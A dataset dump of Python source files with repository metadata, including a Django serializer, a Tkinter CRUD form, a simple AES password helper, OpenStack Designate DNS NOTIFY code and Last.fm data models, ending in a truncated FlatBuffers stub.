blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b0f03d06d9223ce7f593796a991af26bc1c4bfd1 | 01a45aa09bd266e25dae4d2ba9fceddea2441844 | /todo_back/todos/serializer.py | e89a5ee7e7d956df2ee97ace0e468bd6dc0a0c8b | [] | no_license | gusk94/Vue-Django | 1959e75ffee39f3839fc9bafaf79eead724023fa | 82213a96e8d5bc684beb7cf3fcf212bbfcaf8019 | refs/heads/master | 2023-01-10T15:20:08.635383 | 2021-01-06T15:12:59 | 2021-01-06T15:12:59 | 222,366,577 | 0 | 0 | null | 2023-01-05T01:06:52 | 2019-11-18T04:55:18 | Python | UTF-8 | Python | false | false | 467 | py | from rest_framework import serializers
from django.contrib.auth import get_user_model
from .models import Todo
User = get_user_model()
class TodoSerializer(serializers.ModelSerializer):
class Meta:
model = Todo
fields = ('id', 'user', 'title', 'completed', )
class UserDetailSerializer(serializers.ModelSerializer):
todo_set = TodoSerializer(many=True)
class Meta:
model = User
fields = ('id', 'username', 'todo_set', )
| [
"h3652k@gmail.com"
] | h3652k@gmail.com |
3dea6f3140dec8ac1306cefb20ce77918b2be273 | df8e16369f9e24dce76b740dbf879c4a77a3c78c | /Data/create_sample.py | 4288c42c7c202885aa3d9e5464bed71422ca3830 | [] | no_license | HubertRonald/Seattle_Track_2 | 268ea3dca105a3f0ece600f01fa4f3f42213d613 | 49875df048879de8ca6d98be3a86fb445a26883f | refs/heads/master | 2021-02-13T19:13:34.093528 | 2018-09-26T04:19:41 | 2018-09-26T04:19:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 21 18:57:27 2018
@author: saramelvin
"""
import pandas as pd
import pickle as pkl
def read_in_sample():
data_all = pd.read_csv("AIS_LA_SD_Jan_1_to_15_2016_Filtered_by_Proximity.csv")
data_true_pos = pd.read_csv("Example_COLREGs_Interactions_UTM11.csv")
data_sample = data_all.head()
return data_sample, data_true_pos
if __name__ == "__main__":
sample_data, pos_sample = sample_input = read_in_sample()
pkl.dump(sample_data, open("sample_data.p","wb"))
pkl.dump(pos_sample, open("pos_sample.p","wb"))
| [
"saramelvin@Saras-MacBook-Pro.local"
] | saramelvin@Saras-MacBook-Pro.local |
e9be6664dfeea854335fd27a2ead99255732394c | acb5896ac838bc8c3593de2e21b21ff031233439 | /PracticaGuiada1/PracticaGuiada.py | ba21d495c378f93245f7cb7cc1c6a5f16d5fb74f | [] | no_license | vidaljose/pruebasPython | 5c72e1ced4f78b39c481aab7fb958f9e05662645 | 73f7cdd9ddcc95d53fa7aafedd8b30c7b224face | refs/heads/master | 2020-05-07T05:46:31.231577 | 2019-04-09T04:27:13 | 2019-04-09T04:27:13 | 180,284,564 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,531 | py | from tkinter import *
from tkinter import messagebox
from PracticaGuiada1 import PracticaGuiadaBBDD
raiz = Tk()
raiz.title("Practica Guiada")
# -------------------------------Variables
miId = IntVar()
miNombre = StringVar()
miPass = StringVar()
miApellido = StringVar()
miDireccion = StringVar()
miComentario = StringVar()
# -------------------------------Algunas funciones
def borrarFormulario():
miId.set("")
miNombre.set("")
miPass.set("")
miApellido.set("")
miDireccion.set("")
textoComentario.delete('1.0', END)
#miComentario.set("")
def insertarYBorrar():
PracticaGuiadaBBDD.insertarDB(miNombre.get(), miPass.get(), miApellido.get(), miDireccion.get(), textoComentario.get('1.0', END))
borrarFormulario()
def leerProductos(id):
borrarFormulario()
try:
elemento = PracticaGuiadaBBDD.leerDB(id)
#print(elemento[0][1])
miId.set(elemento[0][0])
miNombre.set(elemento[0][1])
miPass.set(elemento[0][2])
miApellido.set(elemento[0][3])
miDireccion.set(elemento[0][4])
textoComentario.insert(INSERT,elemento[0][5])
except:
messagebox.showwarning("ERROR","El elemento no se encuentra en la base de datos")
borrarFormulario()
def actualizarYBorrar():
PracticaGuiadaBBDD.actualizarDB(miId.get(),miNombre.get(), miPass.get(), miApellido.get(), miDireccion.get(), textoComentario.get('1.0', END))
borrarFormulario()
def borrarDeDB():
if PracticaGuiadaBBDD.borrarElementoDB(miId.get()):
borrarFormulario()
def infoAdicional():
messagebox.showinfo("vidal", "Practica Guiada 1.0")
def avisoLicencia():
messagebox.showwarning("Licencia", "Producto bajo licencia GNU")
# -------------------------------Menu
barraMenu = Menu(raiz)
raiz.config(menu=barraMenu, width=300, height=300)
archivoMenu=Menu(barraMenu,tearoff=0)#agregar elementos al menu / tearoff elmina la linea del comienzo
archivoMenu.add_command(label="Conectar",command = PracticaGuiadaBBDD.crearDB)#agregar elementos al submenu
archivoMenu.add_separator()
archivoMenu.add_command(label="Salir", command = raiz.destroy)
archivoBorrar=Menu(barraMenu,tearoff=0)
archivoBorrar.add_command(label="Borrar Formulario",command = borrarFormulario)
archivoCrud=Menu(barraMenu,tearoff = 0)
archivoCrud.add_command(label="Insertar", command = insertarYBorrar)
archivoCrud.add_command(label="Leer", command = lambda: leerProductos(miId.get()))
archivoCrud.add_command(label="Actualizar", command = actualizarYBorrar)
archivoCrud.add_command(label="Borrar", command = borrarDeDB)
archivoAyuda=Menu(barraMenu,tearoff=0)
archivoAyuda.add_command(label="Licencia", command = avisoLicencia)
archivoAyuda.add_command(label="Acerca de ..", command = infoAdicional)
barraMenu.add_cascade(label="BBDD",menu=archivoMenu)
barraMenu.add_cascade(label="Borrar",menu=archivoBorrar)
barraMenu.add_cascade(label="CRUD",menu=archivoCrud)
barraMenu.add_cascade(label="Ayuda",menu=archivoAyuda)
# -------------------------------Formulario
miFrame1 = Frame(raiz,width=1200,height=600)
miFrame1.pack()
miId.set("")
cuadroId = Entry(miFrame1,textvariable=miId)
cuadroId.grid(row=0,column=1)
cuadroId.config(fg="blue",justify="center")
cuadroNombre = Entry(miFrame1,textvariable=miNombre)
cuadroNombre.grid(row=1,column=1)
cuadroNombre.config(fg="red",justify="center")
cuadroPass = Entry(miFrame1, textvariable = miPass)
cuadroPass.grid(row=2,column=1)
cuadroPass.config(show="?")
cuadroApellido = Entry(miFrame1, textvariable = miApellido)
cuadroApellido.grid(row=3,column=1)
cuadroDireccion = Entry(miFrame1, textvariable = miDireccion)
cuadroDireccion.grid(row=4,column=1)
textoComentario = Text(miFrame1,width=16,height=5) #tamano del cuadro de texto
textoComentario.grid(row=5,column=1,padx=10,pady=10)
scrollVert = Scrollbar(miFrame1,command=textoComentario.yview)
scrollVert.grid(row=5,column=2,sticky="nsew") #stiky="nsew adapta el tamano"/
textoComentario.config(yscrollcommand=scrollVert.set)#agrega el scroll para que se conecte en todo momento con el texto
IdLabel = Label(miFrame1,text="ID:")
IdLabel.grid(row=0,column=0,sticky="e",padx=10,pady=10)
nombreLabel = Label(miFrame1,text="Nombre:")
nombreLabel.grid(row=1,column=0,sticky="e",padx=10,pady=10)
passLabel = Label(miFrame1,text="Pass:")
passLabel.grid(row=2,column=0,sticky="e",padx=10,pady=10)
apellidoLabel = Label(miFrame1,text="Apellido:")
apellidoLabel.grid(row=3,column=0,sticky="e",padx=10,pady=10)
direccionLabel = Label(miFrame1,text="Direccion:")
direccionLabel.grid(row=4,column=0,sticky="e",padx=10,pady=10)
comentariosLabel = Label(miFrame1,text="Comentarios:")
comentariosLabel.grid(row=5,column=0,sticky="e",padx=10,pady=10)
"""def codigoBoton():
miNombre.set("Vidal")
botonEnvio=Button(raiz,text="Enviar",command=codigoBoton)
botonEnvio.pack()"""
# -----------------------------------------------------Botones
miFrame2 = Frame(raiz,width=1200,height=50)
miFrame2.pack()
botonInsertar = Button(miFrame2,text = "Insert",command = insertarYBorrar)
botonRead = Button(miFrame2,text = "Read",command = lambda: leerProductos(miId.get()))
botonUpdate = Button(miFrame2,text = "Update",command = actualizarYBorrar)
botonDelete = Button(miFrame2,text = "Delete", command = borrarDeDB)
botonInsertar.grid(row=0,column=0,padx=1,pady=2)
botonRead.grid(row=0,column=1,padx=1,pady=2)
botonUpdate.grid(row=0,column=2,padx=1,pady=2)
botonDelete.grid(row=0,column=3,padx=1,pady=2)
# ---------------------------------------------
raiz.mainloop()
| [
"vidaljose2004@gmail.com"
] | vidaljose2004@gmail.com |
d902613aadcf2bec9d31efa6e223a0237416cd61 | 2750d410e88b1b9e66c99eaaa98d7e9c3a132de7 | /src/crypto.py | aeb40f8d2c39fb2b23b34b40271c4347db9714d5 | [] | no_license | cypher9/PyPlanner | a67e95d913ba41551ff2e1791240c50becf982dd | 07a7cc8cd2d371875a3d4e546d2845280870dc45 | refs/heads/master | 2021-01-21T04:41:30.196406 | 2016-06-27T18:29:32 | 2016-06-27T18:29:32 | 53,264,223 | 0 | 3 | null | 2016-06-21T19:27:32 | 2016-03-06T16:23:51 | Python | UTF-8 | Python | false | false | 2,008 | py | '''
Created on 08.06.2016
@author: cypher9
'''
import random, base64, hashlib, getpass
from Crypto.Cipher import AES
BLOCK_SIZE = 32
PADDING = '{'
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
KEY = None
def generate_key(password):
key = hashlib.sha256(password).digest()
return key
def get_password():
password = getpass.getpass("Password: ")
return password
def set_password():
global KEY
not_matching = True
print("\nSet new password for PyPlanner!\n(Password must be at least 5 characters!)")
while not_matching:
password = get_password()
if len(password) < 5:
print("Password is too short!")
else:
key = generate_key(password)
key_repeat = generate_key(getpass.getpass("Repeat Password: "))
if key == key_repeat:
KEY = key
not_matching = False
else:
print("passwords not matching")
def change_password():
old_pw = generate_key(getpass.getpass("Enter old password: "))
if KEY == old_pw:
set_password()
else:
print("Incorrect password!!")
def encryption(privateInfo):
global KEY
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
if KEY:
key = KEY
else:
key = generate_key(get_password())
KEY = key
encryptor = AES.new(key, AES.MODE_CBC, iv)
encoded = EncodeAES(encryptor, privateInfo)
return iv+encoded
def decryption(encrypted_xml):
global KEY
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
iv = encrypted_xml[:16]
encrypted_xml = encrypted_xml[16:]
if KEY:
key = KEY
else:
key = generate_key(get_password())
KEY = key
decryptor = AES.new(key, AES.MODE_CBC, iv)
decoded = DecodeAES(decryptor, encrypted_xml)
return decoded
| [
"cypher1337@protonmail.com"
] | cypher1337@protonmail.com |
0d4b5ab246bcd2e91a31ac44a798d0bed067d702 | bc233c24523f05708dd1e091dca817f9095e6bb5 | /bitmovin_api_sdk/models/ad_analytics_contains_filter.py | 354ab8dfcae40bdd9aa2cf0bd8e53fb1c6d34042 | [
"MIT"
] | permissive | bitmovin/bitmovin-api-sdk-python | e3d6cf8eb8bdad62cb83ec77c0fc4950b06b9cdd | b0860c0b1be7747cf22ad060985504da625255eb | refs/heads/main | 2023-09-01T15:41:03.628720 | 2023-08-30T10:52:13 | 2023-08-30T10:52:13 | 175,209,828 | 13 | 14 | MIT | 2021-04-29T12:30:31 | 2019-03-12T12:47:18 | Python | UTF-8 | Python | false | false | 3,799 | py | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
from bitmovin_api_sdk.models.ad_analytics_abstract_filter import AdAnalyticsAbstractFilter
from bitmovin_api_sdk.models.ad_analytics_attribute import AdAnalyticsAttribute
import pprint
import six
class AdAnalyticsContainsFilter(AdAnalyticsAbstractFilter):
@poscheck_model
def __init__(self,
name=None,
value=None):
# type: (AdAnalyticsAttribute, object) -> None
super(AdAnalyticsContainsFilter, self).__init__(name=name)
self._value = None
self.discriminator = None
if value is not None:
self.value = value
@property
def openapi_types(self):
types = {}
if hasattr(super(AdAnalyticsContainsFilter, self), 'openapi_types'):
types = getattr(super(AdAnalyticsContainsFilter, self), 'openapi_types')
types.update({
'value': 'object'
})
return types
@property
def attribute_map(self):
attributes = {}
if hasattr(super(AdAnalyticsContainsFilter, self), 'attribute_map'):
attributes = getattr(super(AdAnalyticsContainsFilter, self), 'attribute_map')
attributes.update({
'value': 'value'
})
return attributes
@property
def value(self):
# type: () -> object
"""Gets the value of this AdAnalyticsContainsFilter.
:return: The value of this AdAnalyticsContainsFilter.
:rtype: object
"""
return self._value
@value.setter
def value(self, value):
# type: (object) -> None
"""Sets the value of this AdAnalyticsContainsFilter.
:param value: The value of this AdAnalyticsContainsFilter.
:type: object
"""
if value is not None:
if not isinstance(value, object):
raise TypeError("Invalid type for `value`, type has to be `object`")
self._value = value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
if hasattr(super(AdAnalyticsContainsFilter, self), "to_dict"):
result = super(AdAnalyticsContainsFilter, self).to_dict()
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if value is None:
continue
if isinstance(value, list):
if len(value) == 0:
continue
result[self.attribute_map.get(attr)] = [y.value if isinstance(y, Enum) else y for y in [x.to_dict() if hasattr(x, "to_dict") else x for x in value]]
elif hasattr(value, "to_dict"):
result[self.attribute_map.get(attr)] = value.to_dict()
elif isinstance(value, Enum):
result[self.attribute_map.get(attr)] = value.value
elif isinstance(value, dict):
result[self.attribute_map.get(attr)] = {k: (v.to_dict() if hasattr(v, "to_dict") else v) for (k, v) in value.items()}
else:
result[self.attribute_map.get(attr)] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AdAnalyticsContainsFilter):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"openapi@bitmovin.com"
] | openapi@bitmovin.com |
0833717628a80b38c69325f8536c3136fe2f1c1b | 512c7561596cf46928a9904b4f2a2b484c47e739 | /simplecapp_calculation_engine/exceptions.py | 3e9da460a583719c29c3dcbec1db22a2aed5b879 | [] | no_license | GustavoRonconi/simplecapp_calculation_engine | 110fb84eacdbe4076e21e6e7e6057b37e4d72ef3 | d005bdca7b141dee6d862bf50002df1b14c58434 | refs/heads/main | 2023-05-30T22:10:56.611498 | 2021-07-01T01:10:58 | 2021-07-01T01:10:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74 | py | class InvalidAnnualSummary(Exception):
msg = "invalid_annual_summary"
| [
"gustavoronconi95@gmail.com"
] | gustavoronconi95@gmail.com |
d984996776b3ea153d203518e3b9b95d6a4ce351 | fc2fa418295e015f867b26b6ab91133f26eff0bb | /ExampleCode/gathering.py | 5d31cc8d1e1f5136712e91fdadabfb3a873d7c1e | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | land-boards/PiCluster | 893b0809d5ceeaba2425cd3cfd79598911a65989 | e7a508ab1be25e50b79c585ea861118e37ba9bb3 | refs/heads/master | 2022-04-28T13:02:10.307315 | 2022-04-20T09:55:52 | 2022-04-20T09:55:52 | 62,474,727 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | from mpi4py import MPI
import numpy as np
comm = MPI.COMM_WORLD
size = comm.Get_size()
rank = comm.Get_rank()
numDataPerRank = 10
sendbuf = [rank, size]
print('Rank: ',rank, ', sendbuf: ',sendbuf)
recvbuf = None
if rank == 0:
recvbuf = []
comm.Gather(sendbuf, recvbuf, root=0)
if rank == 0:
print('Rank: ',rank, ', recvbuf received: ',recvbuf)
| [
"doug@douglasgilliland.com"
] | doug@douglasgilliland.com |
823f39203dec17fdc778ad33dcc6296c31fcf5a4 | 86cd22354f2431087c9b3ff06188f071afb3eb72 | /113. Path Sum II.py | 702d8007e664f27151d6db9cd322c6f685000c06 | [] | no_license | tlxxzj/leetcode | 0c072a74d7e61ef4700388122f2270e46c4ac22e | 06dbf4f5b505a6a41e0d93367eedd231b611a84b | refs/heads/master | 2023-08-31T11:04:34.585532 | 2023-08-31T08:25:51 | 2023-08-31T08:25:51 | 94,386,828 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 926 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def pathSum(self, root: TreeNode, targetSum: int) -> List[List[int]]:
ret = []
q = []
if root:
q = [[root.val, root, [root.val]]]
while len(q) > 0:
q2 = []
for sum, node, path in q:
if (sum == targetSum) and (not node.left) and (not node.right):
ret.append(path)
else:
if node.left:
q2.append([sum+node.left.val, node.left, path[:] + [node.left.val]])
if node.right:
path.append(node.right.val)
q2.append([sum+node.right.val, node.right, path])
q = q2
return ret | [
"tlxxzj@qq.com"
] | tlxxzj@qq.com |
58031043f16f68a8aeec4dd903bd58ef62d5e307 | 42c63d5f9c724c99ba93f77bdead51891fcf8623 | /OpenStack-Mitaka-src/designate/designate/mdns/notify.py | 8f3de6c53a97c1fedd4eb1bf6bb8a1af254f72a6 | [
"Apache-2.0"
] | permissive | liyongle/openstack-mitaka | 115ae819d42ed9bf0922a8c0ab584fa99a3daf92 | 5ccd31c6c3b9aa68b9db1bdafcf1b029e8e37b33 | refs/heads/master | 2021-07-13T04:57:53.488114 | 2019-03-07T13:26:25 | 2019-03-07T13:26:25 | 174,311,782 | 0 | 1 | null | 2020-07-24T01:44:47 | 2019-03-07T09:18:55 | Python | UTF-8 | Python | false | false | 13,514 | py | # Copyright (c) 2014 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import socket
import eventlet
import dns
import dns.rdataclass
import dns.rdatatype
import dns.exception
import dns.flags
import dns.rcode
import dns.message
import dns.opcode
from oslo_config import cfg
from oslo_log import log as logging
from designate.mdns import base
from designate.i18n import _LI
from designate.i18n import _LW
dns_query = eventlet.import_patched('dns.query')
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class NotifyEndpoint(base.BaseEndpoint):
RPC_API_VERSION = '2.0'
RPC_API_NAMESPACE = 'notify'
def notify_zone_changed(self, context, zone, host, port, timeout,
retry_interval, max_retries, delay):
"""
:param context: The user context.
:param zone: The designate zone object. This contains the zone
name.
:param host: A notify is sent to this host.
:param port: A notify is sent to this port.
:param timeout: The time (in seconds) to wait for a NOTIFY response
from server.
:param retry_interval: The time (in seconds) between retries.
:param max_retries: The maximum number of retries mindns would do for
sending a NOTIFY message. After this many retries, mindns gives up.
:param delay: The time to wait before sending the first NOTIFY request.
:return: a tuple of (response, current_retry) where
response is the response on success or None on failure.
current_retry is the current retry number.
The return value is just used for testing and not by pool manager.
"""
time.sleep(delay)
return self._make_and_send_dns_message(
zone, host, port, timeout, retry_interval, max_retries,
notify=True)
def poll_for_serial_number(self, context, zone, nameserver, timeout,
retry_interval, max_retries, delay):
"""Get the serial number of a zone on a resolver, then call update_status
on Pool Manager to update the zone status.
:param context: The user context.
:param zone: The designate zone object. This contains the zone
name. zone.serial = expected_serial
:param nameserver: Destination for the poll
:param timeout: The time (in seconds) to wait for a SOA response from
nameserver.
:param retry_interval: The time (in seconds) between retries.
:param max_retries: The maximum number of retries mindns would do for
an expected serial number. After this many retries, mindns returns
an ERROR.
:param delay: The time to wait before sending the first request.
:return: None
"""
(status, actual_serial, retries) = self.get_serial_number(
context, zone, nameserver.host, nameserver.port, timeout,
retry_interval, max_retries, delay)
self.pool_manager_api.update_status(
context, zone, nameserver, status, actual_serial)
def get_serial_number(self, context, zone, host, port, timeout,
retry_interval, max_retries, delay):
"""
:param context: The user context.
:param zone: The designate zone object. This contains the zone
name. zone.serial = expected_serial
:param host: A notify is sent to this host.
:param port: A notify is sent to this port.
:param timeout: The time (in seconds) to wait for a SOA response from
nameserver.
:param retry_interval: The time (in seconds) between retries.
:param max_retries: The maximum number of retries mindns would do for
an expected serial number. After this many retries, mindns returns
an ERROR.
:param delay: The time to wait before sending the first request.
:return: a tuple of (status, actual_serial, retries)
status is either "SUCCESS" or "ERROR".
actual_serial is either the serial number returned in the SOA
message from the nameserver or None.
retries is the number of retries left.
The return value is just used for testing and not by pool manager.
The pool manager is informed of the status with update_status.
"""
actual_serial = None
status = 'ERROR'
retries_left = max_retries
time.sleep(delay)
while True:
response, retry_cnt = self._make_and_send_dns_message(
zone, host, port, timeout, retry_interval, retries_left)
if response and (response.rcode() in (
dns.rcode.NXDOMAIN, dns.rcode.REFUSED, dns.rcode.SERVFAIL)
or not bool(response.answer)):
status = 'NO_ZONE'
if zone.serial == 0 and zone.action in ('DELETE', 'NONE'):
actual_serial = 0
break # Zone not expected to exist
elif response and len(response.answer) == 1 \
and str(response.answer[0].name) == str(zone.name) \
and response.answer[0].rdclass == dns.rdataclass.IN \
and response.answer[0].rdtype == dns.rdatatype.SOA:
# parse the SOA response and get the serial number
rrset = response.answer[0]
actual_serial = rrset.to_rdataset().items[0].serial
# TODO(vinod): Account for serial number wrap around. Unix
# timestamps are used where Designate is primary, but secondary
# zones use different values.
if actual_serial is not None and actual_serial >= zone.serial:
# Everything looks good at this point. Return SUCCESS.
status = 'SUCCESS'
break
retries_left -= retry_cnt
msg = _LW("Got lower serial for '%(zone)s' to '%(host)s:"
"%(port)s'. Expected:'%(es)d'. Got:'%(as)s'."
"Retries left='%(retries)d'") % {
'zone': zone.name, 'host': host, 'port': port,
'es': zone.serial, 'as': actual_serial,
'retries': retries_left}
if not retries_left:
# return with error
LOG.warning(msg)
break
LOG.debug(msg)
# retry again
time.sleep(retry_interval)
# Return retries_left for testing purposes.
return status, actual_serial, retries_left
def _make_and_send_dns_message(self, zone, host, port, timeout,
retry_interval, max_retries, notify=False):
"""
:param zone: The designate zone object. This contains the zone
name.
:param host: The destination host for the dns message.
:param port: The destination port for the dns message.
:param timeout: The time (in seconds) to wait for a response from
destination.
:param retry_interval: The time (in seconds) between retries.
:param max_retries: The maximum number of retries mindns would do for
a response. After this many retries, the function returns.
:param notify: If true, a notify message is constructed else a SOA
message is constructed.
:return: a tuple of (response, current_retry) where
response is the response on success or None on failure.
current_retry is the current retry number
"""
dns_message = self._make_dns_message(zone.name, notify=notify)
retry = 0
response = None
while retry < max_retries:
retry += 1
LOG.info(_LI("Sending '%(msg)s' for '%(zone)s' to '%(server)s:"
"%(port)d'."),
{'msg': 'NOTIFY' if notify else 'SOA',
'zone': zone.name, 'server': host,
'port': port})
try:
response = self._send_dns_message(dns_message, host, port,
timeout)
except socket.error as e:
if e.errno != socket.errno.EAGAIN:
raise # unknown error, let it traceback
# Initial workaround for bug #1558096
LOG.info(
_LW("Got EAGAIN while trying to send '%(msg)s' for "
"'%(zone)s' to '%(server)s:%(port)d'. Timeout="
"'%(timeout)d' seconds. Retry='%(retry)d'") %
{'msg': 'NOTIFY' if notify else 'SOA',
'zone': zone.name, 'server': host,
'port': port, 'timeout': timeout,
'retry': retry})
# retry sending the message
time.sleep(retry_interval)
continue
except dns.exception.Timeout:
LOG.warning(
_LW("Got Timeout while trying to send '%(msg)s' for "
"'%(zone)s' to '%(server)s:%(port)d'. Timeout="
"'%(timeout)d' seconds. Retry='%(retry)d'") %
{'msg': 'NOTIFY' if notify else 'SOA',
'zone': zone.name, 'server': host,
'port': port, 'timeout': timeout,
'retry': retry})
# retry sending the message if we get a Timeout.
time.sleep(retry_interval)
continue
except dns_query.BadResponse:
LOG.warning(
_LW("Got BadResponse while trying to send '%(msg)s' "
"for '%(zone)s' to '%(server)s:%(port)d'. Timeout"
"='%(timeout)d' seconds. Retry='%(retry)d'") %
{'msg': 'NOTIFY' if notify else 'SOA',
'zone': zone.name, 'server': host,
'port': port, 'timeout': timeout,
'retry': retry})
break # no retries after BadResponse
# either we have a good response or an error that we don't want to
# recover by retrying
break
# Check that we actually got a NOERROR in the rcode and and an
# authoritative answer
if response is None:
pass
elif (response.rcode() in
(dns.rcode.NXDOMAIN, dns.rcode.REFUSED,
dns.rcode.SERVFAIL)) or \
(response.rcode() == dns.rcode.NOERROR and
not bool(response.answer)):
LOG.info(_LI("%(zone)s not found on %(server)s:%(port)d") %
{'zone': zone.name, 'server': host, 'port': port})
elif not (response.flags & dns.flags.AA) or dns.rcode.from_flags(
response.flags, response.ednsflags) != dns.rcode.NOERROR:
LOG.warning(
_LW("Failed to get expected response while trying to "
"send '%(msg)s' for '%(zone)s' to '%(server)s:"
"%(port)d'.\nResponse message:\n%(resp)s\n") %
{'msg': 'NOTIFY' if notify else 'SOA',
'zone': zone.name, 'server': host,
'port': port, 'resp': str(response)})
response = None
return response, retry
def _make_dns_message(self, zone_name, notify=False):
"""
This constructs a SOA query or a dns NOTIFY message.
:param zone_name: The zone name for which a SOA/NOTIFY needs to be
sent.
:param notify: If true, a notify message is constructed else a SOA
message is constructed.
:return: The constructed message.
"""
dns_message = dns.message.make_query(zone_name, dns.rdatatype.SOA)
dns_message.flags = 0
if notify:
dns_message.set_opcode(dns.opcode.NOTIFY)
dns_message.flags |= dns.flags.AA
else:
# Setting the flags to RD causes BIND9 to respond with a NXDOMAIN.
dns_message.set_opcode(dns.opcode.QUERY)
dns_message.flags |= dns.flags.RD
return dns_message
def _send_dns_message(self, dns_message, host, port, timeout):
"""
:param dns_message: The dns message that needs to be sent.
:param host: The destination ip of dns_message.
:param port: The destination port of dns_message.
:param timeout: The timeout in seconds to wait for a response.
:return: response
"""
if not CONF['service:mdns'].all_tcp:
response = dns_query.udp(
dns_message, host, port=port, timeout=timeout)
else:
response = dns_query.tcp(
dns_message, host, port=port, timeout=timeout)
return response
| [
"yongle.li@gmail.com"
] | yongle.li@gmail.com |
5b7df660ee7701e34eea19a2b1b94169c502436b | 0fe9336b4c7b435759c32b8c400497798327e0f0 | /fmframework/model/__init__.py | b005eca2c39580755209d4967ff3b07a1a1f6b16 | [] | no_license | Sarsoo/pyfmframework | 53e313f3eb434f23d2e991295c7628867e81c9cf | 0561b0036e9f45bc35f51ff83fb33d79f61329e7 | refs/heads/master | 2022-12-23T03:59:17.134576 | 2022-12-10T09:44:05 | 2022-12-10T09:44:05 | 175,917,353 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,573 | py | from dataclasses import dataclass
from datetime import datetime
from enum import Enum
from typing import List
class Image:
class Size(Enum):
other = 0
small = 1
medium = 2
large = 3
extralarge = 4
mega = 5
def __init__(self, size: Size, link: str):
self.size = size
self.link = link
def __str__(self):
return f'{self.size.name} - {self.link}'
@dataclass
class Wiki:
published: datetime = None
summary: str = None
content: str = None
def __post_init__(self):
if isinstance(self.published, str):
self.published = datetime.strptime(self.published, '%d %b %Y, %H:%M')
@dataclass
class LastFM:
name: str = None
url: str = None
mbid: str = None
listeners: int = None
play_count: int = None
user_scrobbles: int = None
wiki: Wiki = None
images: List[Image] = None
def __str__(self):
return self.name
@dataclass(eq=False)
class Artist(LastFM):
def __str__(self):
return f'{self.name}'
def __eq__(self, other):
return self.__class__ == other.__class__ and self.name == other.name
@dataclass(eq=False)
class Album(LastFM):
artist: Artist = None
def __str__(self):
return f'{self.name} / {self.artist}'
def __eq__(self, other):
return self.__class__ == other.__class__ \
and \
(self.name, self.artist) == (other.name, other.artist)
@dataclass(eq=False)
class Track(LastFM):
album: Album = None
artist: Artist = None
duration: int = None
def __str__(self):
return f'{self.name} / {self.album} / {self.artist}'
def __eq__(self, other):
return self.__class__ == other.__class__ \
and \
(self.name, self.album, self.artist) == (other.name, self.album, other.artist)
class WeeklyChart:
def __init__(self, from_time, to_time):
self.from_secs = from_time
self.to_secs = to_time
@property
def from_date(self):
return datetime.fromtimestamp(self.from_secs)
@property
def to_date(self):
return datetime.fromtimestamp(self.to_secs)
def __str__(self):
return f'{self.from_secs} -> {self.to_secs}'
@dataclass
class Scrobble:
track: Track = None
time: datetime = None
def __str__(self):
return self.track
def __eq__(self, other):
return self.__class__ == other.__class__ \
and \
(self.track, self.time) == (other.track, self.time)
| [
"andrewjpack@gmail.com"
] | andrewjpack@gmail.com |
f8f7ce5994c6a5c8be5690040c6ae3e271794bd7 | 20cda6f6b14d9b91e64d43b8261f7832572be85f | /pyschema/f143_structure/ArrayULong.py | 4954b9b5940f5c8444c0ab0ad08e5b807c97ded1 | [] | no_license | ess-dmsc/lauschangriff | f9f2bacb7a5483423919fbfc8948e8a56a070800 | 3735c5f84798efc280e0931bc48129339658f400 | refs/heads/master | 2021-08-19T13:22:41.702602 | 2020-04-21T15:13:18 | 2020-04-21T15:13:18 | 168,178,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,603 | py | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: f143_structure
import flatbuffers
class ArrayULong(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsArrayULong(cls, buf, offset):
